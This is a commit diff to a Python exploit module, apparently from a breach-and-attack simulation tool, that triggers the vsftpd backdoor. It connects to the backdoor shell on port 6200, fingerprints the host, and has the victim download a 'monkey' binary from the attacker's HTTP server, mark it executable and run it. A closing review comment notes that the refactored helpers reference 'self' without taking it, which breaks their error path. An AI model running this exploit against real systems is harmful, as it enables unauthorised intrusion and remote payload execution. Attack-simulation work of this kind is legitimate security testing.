Update vsftpd.py
Implemented three functions (socket_connect, socket_send, socket_send_recv) to handle the exception as advised.
parent
525e541156
commit
9e5292dc8e
|
@ -30,38 +30,73 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
super(VSFTPDExploiter, self).__init__(host)
|
super(VSFTPDExploiter, self).__init__(host)
|
||||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
self.skip_exist = self._config.skip_exploit_if_file_exist
|
||||||
|
|
||||||
def exploit_host(self):
|
def socket_connect(s,ip_addr,port):
|
||||||
try:
|
try:
|
||||||
LOG.info('Attempting to trigger backdoor...')
|
s.connect((ip_addr,port))
|
||||||
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
return True
|
||||||
ftp_socket.connect((self.host.ip_addr, FTP_PORT))
|
except socket.error as e:
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
LOG.error('Failed to connect to %s' , self.host.ip_addr)
|
||||||
# Attempt to login to trigger backdoor
|
|
||||||
ftp_socket.send(USERNAME)
|
return False
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
|
||||||
ftp_socket.send(PASSWORD)
|
def socket_send_recv(s,message):
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
try:
|
||||||
ftp_socket.close()
|
s.send(message)
|
||||||
LOG.info('Triggered backdoor')
|
return s.recv(128).decode('utf-8')
|
||||||
|
|
||||||
except socket.error as e:
|
except socket.error as e:
|
||||||
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
def socket_send(s,message):
|
||||||
try:
|
try:
|
||||||
|
s.send(message)
|
||||||
|
return True
|
||||||
|
|
||||||
|
except socket.error as e:
|
||||||
|
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
|
||||||
|
LOG.info('Attempting to trigger backdoor...')
|
||||||
|
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT):
|
||||||
|
ftp_socket.recv(128).decode('utf-8')
|
||||||
|
|
||||||
|
# Attempt to login to trigger backdoor
|
||||||
|
|
||||||
|
if socket_send_recv(ftp_socket,USERNAME):
|
||||||
|
if socket_send_recv(ftp_socket,PASSWORD):
|
||||||
|
ftp_socket.close()
|
||||||
|
LOG.info('Triggered backdoor')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
LOG.info('Attempting to connect to backdoor...')
|
LOG.info('Attempting to connect to backdoor...')
|
||||||
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
backdoor_socket.connect((self.host.ip_addr, 6200))
|
|
||||||
|
if socket_connect(backdoor_socket,self.host.ip_addr, 6200):
|
||||||
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
||||||
|
|
||||||
command = str.encode("uname -m" + '\n')
|
command = str.encode("uname -m" + '\n')
|
||||||
backdoor_socket.send(command)
|
|
||||||
response = backdoor_socket.recv(128).decode('utf-8')
|
response = socket_send_recv(backdoor_socket,command)
|
||||||
|
if response:
|
||||||
LOG.info('Response for uname -m: %s', response)
|
LOG.info('Response for uname -m: %s', response)
|
||||||
if '' != response.lower().strip():
|
if '' != response.lower().strip():
|
||||||
# command execution is successful
|
# command execution is successful
|
||||||
self.host.os['machine'] = response.lower().strip()
|
self.host.os['machine'] = response.lower().strip()
|
||||||
self.host.os['type'] = 'linux'
|
self.host.os['type'] = 'linux'
|
||||||
|
|
||||||
else :
|
else :
|
||||||
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
|
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
|
||||||
|
|
||||||
|
@ -73,8 +108,6 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
|
||||||
|
|
||||||
# copy the monkey into the machine
|
# copy the monkey into the machine
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
|
@ -85,19 +118,29 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
http_path, dropper_target_path_linux)
|
http_path, dropper_target_path_linux)
|
||||||
LOG.info("Download_command is %s",download_command)
|
LOG.info("Download_command is %s",download_command)
|
||||||
|
|
||||||
command = str.encode(str(download_command) + '\n')
|
download_command = str.encode(str(download_command) + '\n')
|
||||||
backdoor_socket.send(command)
|
|
||||||
|
if socket_send(backdoor_socket,download_command):
|
||||||
|
LOG.info('Monkey is now Downloaded ')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to download monkey at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
# changeit to executable
|
# changeit to executable
|
||||||
|
|
||||||
execute_command = "/bin/chmod +x %s" % dropper_target_path_linux
|
Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux
|
||||||
LOG.info("Execute_command is %s",execute_command)
|
LOG.info("Change_exec_permission is %s",Change_exec_permission)
|
||||||
|
|
||||||
command = str.encode(str(execute_command) + '\n')
|
Change_exec_permission = str.encode(str(Change_exec_permission) + '\n')
|
||||||
|
|
||||||
backdoor_socket.send(command)
|
if socket_send(backdoor_socket,Change_exec_permission):
|
||||||
|
LOG.info('Monkey can now be executed ')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
# run the monkey
|
# run the monkey
|
||||||
|
@ -105,17 +148,16 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
cmdline += "&"
|
cmdline += "&"
|
||||||
|
|
||||||
command = str.encode(str(cmdline) + '\n')
|
run_monkey = str.encode(str(cmdline) + '\n')
|
||||||
backdoor_socket.send(command)
|
if socket_send(backdoor_socket,run_monkey):
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
self._config.dropper_target_path_linux, self.host, cmdline)
|
self._config.dropper_target_path_linux, self.host, cmdline)
|
||||||
|
else:
|
||||||
|
LOG.error('Monkey failed to run at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
self._exploit_info['Vulnerability'] = {"Success":"True"}
|
self._exploit_info['Vulnerability'] = {"Success":"True"}
|
||||||
|
|
||||||
except socket.error as e:
|
|
||||||
LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr)
|
|
||||||
LOG.error('Error Connecting to backdoor. Error: %s' % e)
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
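Review bot: The three new helpers `socket_connect(s,ip_addr,port)`, `socket_send_recv(s,message)` and `socket_send(s,message)` log `self.host.ip_addr` in their `except socket.error` branches but take no `self` parameter, so the error path this commit adds would itself raise `NameError` instead of returning `False`. Indentation is lost in this rendering, so whether they sit inside `VSFTPDExploiter` or at module level cannot be confirmed; if they are methods, declare them as `def socket_connect(self, s, ip_addr, port):` and call them as `self.socket_connect(...)` from `exploit_host`. The caught exception `e` is never used, so the log loses the reason for the failure; `LOG.error('Failed to connect to %s: %s', ip_addr, e)` would keep it. The early `return False` branches also appear to leave `ftp_socket` and `backdoor_socket` open, and no timeout is set on either socket in the visible lines, so a `try`/`finally` close and a `settimeout` call on each would keep a failed run from hanging on `recv` or leaking descriptors.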